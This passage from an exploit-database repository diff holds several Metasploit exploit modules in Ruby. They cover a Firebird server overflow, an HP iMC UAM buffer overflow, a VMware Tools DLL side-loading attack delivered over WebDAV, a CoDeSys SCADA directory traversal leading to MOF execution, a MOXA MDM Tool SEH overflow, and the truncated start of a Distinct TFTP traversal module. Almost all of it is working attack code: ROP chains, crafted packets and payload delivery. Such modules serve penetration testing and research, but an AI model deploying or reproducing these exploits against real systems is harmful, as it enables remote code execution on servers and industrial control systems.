'DisclosureDate' => 'Jan 31 2013'
)
register_options([Opt::RPORT(3050)], self.class)
end
def check
begin
connect
rescue
vprint_error("Unable to get a connection")
return Exploit::CheckCode::Unknown
end
filename = "C:\\#{rand_text_alpha(12)}.fdb"
username = rand_text_alpha(7)
check_data = ""
check_data << "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"
check_data << "\x00\x00\x00\x13"
check_data << filename
check_data << "\x00\x00\x00\x00\x04\x00\x00\x00\x24"
check_data << "\x01\x07" << username << "\x04\x15\x6c\x6f\x63\x61\x6c"
check_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"
check_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"
check_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"
check_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"
check_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"
check_data << "\xff\xff\x80\x0c\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"
check_data << "\x00\x00\x00\x08"
sock.put(check_data)
data = sock.recv(16)
disconnect
opcode = data.unpack("N*")[0]
if opcode == 3 # Accept
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def stack_pivot_rop_chain
case target.name
when 'Windows FB 2.5.2.26539'
rop_chain = [
0x005e1ea4, # MOV EAX,EDI # RETN [fbserver.exe]
0x0059ffeb, # POP EBP # RETN [fbserver.exe]
0x0000153c, # 0x0000153c-> ebp
0x005d261f, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
0x0059fe1f, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
].pack("V*")
when 'Windows FB 2.5.1.26351'
rop_chain = [
0x005e1ab8, # MOV EAX,EDI # RETN [fbserver.exe]
0x0059650b, # POP EBP # RETN [fbserver.exe]
0x0000153c, # 0x0000153c-> ebp
0x005cf6ff, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
0x0059a3db, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
].pack("V*")
when 'Windows FB 2.1.5.18496'
rop_chain = [
0x0055b844, # MOV EAX,EDI # RETN [fbserver.exe]
0x4a86ee77, # POP ECX # RETN [icuuc30.dll]
0x000001c0, # 0x000001c0-> ecx
0x005aee63, # ADD EAX,ECX # RETN [fbserver.exe]
0x4a82d326, # XCHG EAX,ESP # RETN [icuuc30.dll]
].pack("V*")
when 'Windows FB 2.1.4.18393'
rop_chain = [
0x0042264c, # MOV EAX,EDI # RETN [fbserver.exe]
0x4a8026e1, # POP ECX # RETN [icuuc30.dll]
0x000001c0, # 0x000001c0-> ecx
0x004c5499, # ADD EAX,ECX # RETN [fbserver.exe]
0x4a847664, # XCHG EAX,ESP # RETN [icuuc30.dll]
].pack("V*")
when 'Debug'
rop_chain = [ ].fill(0x41414141, 0..5).pack("V*")
end
return rop_chain
end
def final_rop_chain
# all rop chains in here created with mona.py, thanks corelan!
case target.name
when 'Windows FB 2.5.2.26539'
rop_chain = [
0x4a831344, # POP ECX # RETN [icuuc30.dll]
0x0065f16c, # ptr to &VirtualAlloc() [IAT fbserver.exe]
0x005989f0, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
0x004666a6, # XCHG EAX,ESI # RETN [fbserver.exe]
0x00431905, # POP EBP # RETN [fbserver.exe]
0x00401932, # & push esp # ret [fbserver.exe]
0x4a844ac0, # POP EBX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> ebx
0x4a85bfee, # POP EDX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> edx
0x005dae9e, # POP ECX # RETN [fbserver.exe]
0x00000040, # 0x00000040-> ecx
0x0057a822, # POP EDI # RETN [fbserver.exe]
0x005b0384, # RETN (ROP NOP) [fbserver.exe]
0x0046f8c3, # POP EAX # RETN [fbserver.exe]
0x90909090, # nop
0x00586002, # PUSHAD # RETN [fbserver.exe]
].pack("V*")
when 'Windows FB 2.5.1.26351'
rop_chain = [
0x00656472, # POP ECX # RETN [fbserver.exe]
0x0065b16c, # ptr to &VirtualAlloc() [IAT fbserver.exe]
0x00410940, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
0x0063be76, # XCHG EAX,ESI # RETN [fbserver.exe]
0x0041d1ae, # POP EBP # RETN [fbserver.exe]
0x0040917f, # & call esp [fbserver.exe]
0x4a8589c0, # POP EBX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> ebx
0x4a864cc3, # POP EDX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> edx
0x0064ef59, # POP ECX # RETN [fbserver.exe]
0x00000040, # 0x00000040-> ecx
0x005979fa, # POP EDI # RETN [fbserver.exe]
0x00424a50, # RETN (ROP NOP) [fbserver.exe]
0x4a86052d, # POP EAX # RETN [icuuc30.dll]
0x90909090, # nop
0x005835f2, # PUSHAD # RETN [fbserver.exe]
].pack("V*")
when 'Windows FB 2.1.5.18496'
rop_chain = [
0x005763d5, # POP EAX # RETN [fbserver.exe]
0x005ce120, # ptr to &VirtualAlloc() [IAT fbserver.exe]
0x004865a4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [fbserver.exe]
0x004cf4f6, # XCHG EAX,ESI # RETN [fbserver.exe]
0x004e695a, # POP EBP # RETN [fbserver.exe]
0x004d9e6d, # & jmp esp [fbserver.exe]
0x4a828650, # POP EBX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> ebx
0x4a85bfee, # POP EDX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> edx
0x00590328, # POP ECX # RETN [fbserver.exe]
0x00000040, # 0x00000040-> ecx
0x4a8573a1, # POP EDI # RETN [icuuc30.dll]
0x0042ba8c, # RETN (ROP NOP) [fbserver.exe]
0x00577605, # POP EAX # RETN [fbserver.exe]
0x90909090, # nop
0x004530ce, # PUSHAD # RETN [fbserver.exe]
].pack("V*")
when 'Windows FB 2.1.4.18393'
rop_chain = [
0x4a843429, # POP ECX # RETN [icuuc30.dll]
0x005ca120, # ptr to &VirtualAlloc() [IAT fbserver.exe]
0x0055a870, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
0x004cecf6, # XCHG EAX,ESI # RETN [fbserver.exe]
0x004279c0, # POP EBP # RETN [fbserver.exe]
0x0040747d, # & call esp [fbserver.exe]
0x004ebef1, # POP EBX # RETN [fbserver.exe]
0x00001000, # 0x00001000-> ebx
0x4a864c5e, # POP EDX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> edx
0x004eaa3b, # POP ECX # RETN [fbserver.exe]
0x00000040, # 0x00000040-> ecx
0x4a8330a2, # POP EDI # RETN [icuuc30.dll]
0x00423b82, # RETN (ROP NOP) [fbserver.exe]
0x0046b5b1, # POP EAX # RETN [fbserver.exe]
0x90909090, # nop
0x004c8cfc, # PUSHAD # RETN [fbserver.exe]
].pack("V*")
when 'Debug'
rop_chain = [ ].fill(0x41414141, 0..17).pack("V*")
end
return rop_chain
end
def exploit
connect
rop_nop_sled = [ ].fill(target['rop_nop'], 0..16).pack("V*")
# this data gets written to the stack via memcpy, no more than 32 bytes can be written
overwrite_and_rop_chain = [ target['rop_pop'] ].pack("V") # POP to skip the 4 bytes of the original pivot
overwrite_and_rop_chain << [ (target['pivot'] - 8) ].pack("V") # MOV EDX,DWORD PTR DS:[EAX+8]
overwrite_and_rop_chain << stack_pivot_rop_chain
filename = "C:\\#{rand_text_alpha(13)}.fdb"
evil_data = "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"
evil_data << "\x00\x00\x00\x14"
evil_data << filename
evil_data << "\x00\x00\x00\x04\x00\x00\x00\x24"
evil_data << "\x05\x20"
evil_data << overwrite_and_rop_chain
evil_data << "\x15\x6c\x6f\x63\x61\x6c"
evil_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"
evil_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"
evil_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"
evil_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"
evil_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"
evil_data << "\x41\x41\x41\x41\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"
evil_data << "\x00\x00\x00\x08\x00\x41\x41\x41"
evil_data << rop_nop_sled
evil_data << final_rop_chain
evil_data << payload.encoded
print_status("#{rhost}:#{rport} - Sending Connection Request For #{filename}")
sock.put(evil_data)
disconnect
end
end

127
platforms/windows/local/41710.rb Executable file
View file

@ -0,0 +1,127 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Intelligent Management Center UAM Buffer Overflow',
'Description' => %q{
This module exploits a remote buffer overflow in HP Intelligent Management Center
UAM. The vulnerability exists in the uam.exe component, when using sprint in a
insecure way for logging purposes. The vulnerability can be triggered by sending a
malformed packet to the 1811/UDP port. The module has been successfully tested on
HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP bypass).
},
'License' => MSF_LICENSE,
'Author' =>
[
'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability discovery
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2012-3274'],
['OSVDB', '85060'],
['BID', '55271'],
['ZDI', '12-171'],
['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03589863']
],
'Payload' =>
{
'BadChars' => "\x00\x0d\x0a",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500
'Space' => 3925,
'DisableNops' => true
},
'Platform' => ['win'],
'Targets' =>
[
[ 'HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2',
{
'Offset' => 4035,
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Aug 29 2012',
'DefaultTarget' => 0))
register_options([Opt::RPORT(1811)], self.class)
end
def junk(n=4)
return rand_text_alpha(n).unpack("V")[0].to_i
end
def nop
return make_nops(4).unpack("V")[0].to_i
end
def send_echo_reply(operator)
packet = [0xF7103D21].pack("N") # command id
packet << rand_text(18)
packet << [0x102].pack("n") # watchdog command type => echo reply
packet << "AAAA" # ip (static to make offset until EIP static)
packet << "AA" # port (static to make offset until EIP static)
packet << operator # Operator max length => 4066, in order to bypass packet length restriction: 4096 total
connect_udp
udp_sock.put(packet)
disconnect_udp
end
def exploit
# ROP chain generated with mona.py - See corelan.be
rop_gadgets =
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77bb0c86, # XCHG EAX,ESI # RETN
0x77bc9801, # POP EBP # RETN
0x77be2265, # ptr to 'push esp # ret'
0x77bb2563, # POP EAX # RETN
0x03C0990F,
0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)
0x77bb48d3, # POP EBX, RET
0x77bf21e0, # .data
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
0x77bbfc02, # POP ECX # RETN
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
0x77bd8c04, # POP EDI # RETN
0x77bd8c05, # ROP NOP (-> edi)
0x77bb2563, # POP EAX # RETN
0x03c0984f,
0x77bdd441, # SUB EAX, 03c0940f
0x77bb8285, # XCHG EAX,EDX # RETN
0x77bb2563, # POP EAX # RETN
nop,
0x77be6591, # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
bof = rand_text(14)
bof << rop_gadgets
bof << payload.encoded
bof << "C" * (target['Offset'] - 14 - rop_gadgets.length - payload.encoded.length)
bof << [0x77bb0c86].pack("V") # EIP => XCHG EAX,ESI # RETN # from msvcrt.dll
bof << [0x77bcc397].pack("V") # ADD EAX,2C # POP EBP # RETN # from msvcrt.dll
bof << [junk].pack("V") # EBP
bof << [0x77bcba5e].pack("V") # XCHG EAX,ESP # RETN # from msvcrt.dll
print_status("Trying target #{target.name}...")
send_echo_reply(rand_text(20)) # something like... get up! ?
send_echo_reply(bof) # exploit
end
end

346
platforms/windows/local/41711.rb Executable file
View file

@ -0,0 +1,346 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',
'Description' => %q{
A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,
a component of VMware Tools. This issue can be exploited by luring a victim into
opening a document from the attacker's share. An attacker can exploit this issue to
execute arbitrary code with the privileges of the target user. This can potentially
result in the attacker taking complete control of the affected system. If the WebDAV
Mini-Redirector is enabled, it is possible to exploit this issue over the internet.
},
'Author' => 'Yorick Koster',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2016-5330'],
['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'],
['URL', 'http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' => { 'Space' => 2048, },
'Platform' => 'win',
'Targets' =>
[
[ 'Windows x64', {'Arch' => ARCH_X64,} ],
[ 'Windows x86', {'Arch' => ARCH_X86,} ]
],
'Privileged' => false,
'DisclosureDate' => 'Aug 5 2016',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]),
OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ]),
OptString.new('BASENAME', [ true, "The base name for the docx file", "Document1" ]),
OptString.new('SHARENAME', [ true, "The name of the top-level share", "documents" ])
], self.class)
# no SSL
deregister_options('SSL', 'SSLVersion', 'SSLCert')
end
def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
process_options(cli, request)
when 'PROPFIND'
process_propfind(cli, request)
when 'GET'
process_get(cli, request)
else
print_status("#{request.method} => 404 (#{request.uri})")
resp = create_response(404, "Not Found")
resp.body = ""
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
end
end
def process_get(cli, request)
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
webdav = "\\\\#{myhost}\\"
if (request.uri =~ /vmhgfs\.dll$/i)
print_status("GET => DLL Payload (#{request.uri})")
return if ((p = regenerate_payload(cli)) == nil)
data = generate_payload_dll({ :arch => target['Arch'], :code => p.encoded })
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
if (request.uri =~ /\.docx$/i)
print_status("GET => DOCX (#{request.uri})")
send_response(cli, "", { 'Content-Type' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' })
return
end
if (request.uri[-1,1] == "/" or request.uri =~ /index\.html?$/i)
print_status("GET => REDIRECT (#{request.uri})")
resp = create_response(200, "OK")
resp.body = %Q|<html><head><meta http-equiv="refresh" content="0;URL=file:\\\\#{@exploit_unc}#{datastore['SHARENAME']}\\#{datastore['BASENAME']}.docx"></head><body></body></html>|
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
return
end
print_status("GET => 404 (#{request.uri})")
resp = create_response(404, "Not Found")
resp.body = ""
cli.send_response(resp)
end
#
# OPTIONS requests sent by the WebDav Mini-Redirector
#
def process_options(cli, request)
print_status("OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'Cache-Control' => 'private'
}
resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
resp.body = ""
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
#
# PROPFIND requests sent by the WebDav Mini-Redirector
#
def process_propfind(cli, request)
path = request.uri
print_status("PROPFIND #{path}")
body = ''
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
my_uri = "http://#{my_host}/"
if path !~ /\/$/
if blacklisted_path?(path)
print_status "PROPFIND => 404 (#{path})"
resp = create_response(404, "Not Found")
resp.body = ""
cli.send_response(resp)
return
end
if path.index(".")
print_status "PROPFIND => 207 File (#{path})"
body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
# send the response
resp = create_response(207, "Multi-Status")
resp.body = body
resp['Content-Type'] = 'text/xml; charset="utf8"'
cli.send_response(resp)
return
else
print_status "PROPFIND => 301 (#{path})"
resp = create_response(301, "Moved")
resp["Location"] = path + "/"
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
return
end
end
print_status "PROPFIND => 207 Directory (#{path})"
body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
|
if request["Depth"].to_i > 0
trail = path.split("/")
trail.shift
case trail.length
when 0
body << generate_shares(path)
when 1
body << generate_files(path)
end
else
print_status "PROPFIND => 207 Top-Level Directory"
end
body << "</D:multistatus>"
body.gsub!(/\t/, '')
# send the response
resp = create_response(207, "Multi-Status")
resp.body = body
resp['Content-Type'] = 'text/xml; charset="utf8"'
cli.send_response(resp)
end
def generate_shares(path)
share_name = datastore['SHARENAME']
%Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{share_name}/</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
|
end
def generate_files(path)
trail = path.split("/")
return "" if trail.length < 2
%Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{datastore['BASENAME']}.docx</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
|
end
def gen_timestamp(ttype=nil)
::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT")
end
def gen_datestamp(ttype=nil)
::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ")
end
# This method rejects requests that are known to break exploitation
def blacklisted_path?(uri)
return true if uri =~ /\.exe/i
return true if uri =~ /\.(config|manifest)/i
return true if uri =~ /desktop\.ini/i
return true if uri =~ /lib.*\.dll/i
return true if uri =~ /\.tmp$/i
return true if uri =~ /(pcap|packet)\.dll/i
false
end
def exploit
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
@exploit_unc = "\\\\#{myhost}\\"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
print_status("Files are available at #{@exploit_unc}#{datastore['SHARENAME']}")
super
end
end

102
platforms/windows/local/41712.rb Executable file
View file

@ -0,0 +1,102 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
# http://metasploit.com
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::WbemExec
def initialize(info = {})
super(update_info(info,
'Name' => 'SCADA 3S CoDeSys Gateway Server Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability that allows arbitrary
file creation, which can be used to execute a mof file in order to gain remote
execution within the SCADA system.
},
'Author' =>
[
'Enrique Sanchez <esanchez[at]accuvant.com>'
],
'License' => 'MSF_LICENSE',
'References' =>
[
['CVE', '2012-4705'],
['OSVDB', '90368'],
['URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-050-01-a.pdf']
],
'DisclosureDate' => 'Feb 02 2013',
'Platform' => 'win',
'Targets' =>
[
['Windows Universal S3 CoDeSyS < 2.3.9.27', { }]
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(1211),
], self.class)
end
##
# upload_file(remote_filepath, remote_filename, local_filedata)
#
# remote_filepath: Remote filepath where the file will be uploaded
# remote_filename: Remote name of the file to be executed ie. boot.ini
# local_file: File containing the read data for the local file to be uploaded, actual open/read/close done in exploit()
def upload_file(remote_filepath, remote_filename, local_filedata = null)
magic_code = "\xdd\xdd"
opcode = [6].pack('L')
# We create the filepath for the upload, for execution it should be \windows\system32\wbem\mof\<file with extension mof!
file = "..\\..\\" << remote_filepath << remote_filename << "\x00"
pkt_size = local_filedata.size() + file.size() + (0x108 - file.size()) + 4
# Magic_code + packing + size
pkt = magic_code << "AAAAAAAAAAAA" << [pkt_size].pack('L')
tmp_pkt = opcode << file
tmp_pkt += "\x00"*(0x108 - tmp_pkt.size) << [local_filedata.size].pack('L') << local_filedata
pkt << tmp_pkt
print_status("Starting upload of file #{remote_filename}")
connect
sock.put(pkt)
disconnect
print_status("File uploaded")
end
def exploit
print_status("Attempting to communicate with SCADA system #{rhost} on port #{rport}")
# We create an exe payload, we have to get remote execution in 2 steps
exe = generate_payload_exe
exe_name = Rex::Text::rand_text_alpha(8) + ".exe"
upload_file("windows\\system32\\", exe_name, exe)
# We create the mof file and upload (second step)
mof_name = Rex::Text::rand_text_alpha(8) + ".mof"
mof = generate_mof(mof_name, exe_name)
upload_file("WINDOWS\\system32\\wbem\\mof\\", mof_name, mof)
print_status("Everything is ready, waiting for a session ... ")
handler
#Taken from the spooler exploit writen byt jduck and HDMoore
cnt = 1
while session_created? == false and cnt < 25
::IO.select(nil, nil, nil, 0.25)
cnt += 1
end
end
end

76
platforms/windows/local/41713.rb Executable file
View file

@ -0,0 +1,76 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
When sending a specially crafted MDMGw (MDM2_Gateway) response, an
attacker may be able to execute arbitrary code.
},
'Author' => [ 'Ruben Santamarta', 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-4741'],
[ 'OSVDB', '69027'],
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...
],
'Privileged' => false,
'DisclosureDate' => 'Oct 20 2010',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])
], self.class)
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
client.get_once
sploit = rand_text_alpha_upper(18024)
sploit[0, 4] = [0x29001028].pack('V')
sploit[472, payload.encoded.length] = payload.encoded
sploit[1072, 8] = generate_seh_record(target.ret)
sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string
client.put(sploit)
handler(client)
service.close_client(client)
end
end

105
platforms/windows/webapps/41714.rb Executable file
View file

@ -0,0 +1,105 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Rex::Proto::TFTP
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info={})
super(update_info(info,
'Name' => "Distinct TFTP 3.10 Writable Directory Traversal Execution",
'Description' => %q{
This module exploits a vulnerability found in Distinct TFTP server. The
software contains a directory traversal vulnerability that allows a remote
attacker to write arbitrary file to the file system, which results in
code execution under the context of 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' =>
[
'modpr0be', #Initial discovery, PoC (Tom Gregory)
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '80984'],
['EDB', '18718'],
['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf'],
['CVE', '2012-6664']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Targets' =>
[
['Distinct TFTP 3.10 on Windows', {}]
],
'Privileged' => false,
'DisclosureDate' => "Apr 8 2012",
'DefaultTarget' => 0))
register_options([
OptInt.new('DEPTH', [false, "Levels to reach base directory",10]),
OptAddress.new('RHOST', [true, "The remote TFTP server address"]),
OptPort.new('RPORT', [true, "The remote TFTP server port", 69])
], self.class)
end
def upload(filename, data)
tftp_client = Rex::Proto::TFTP::Client.new(
"LocalHost" => "0.0.0.0",
"LocalPort" => 1025 + rand(0xffff-1025),
"PeerHost" => datastore['RHOST'],
"PeerPort" => datastore['RPORT'],
"LocalFile" => "DATA:#{data}",
"RemoteFile" => filename,
"Mode" => "octet",
"Context" => {'Msf' => self.framework, "MsfExploit" => self },
"Action" => :upload
)
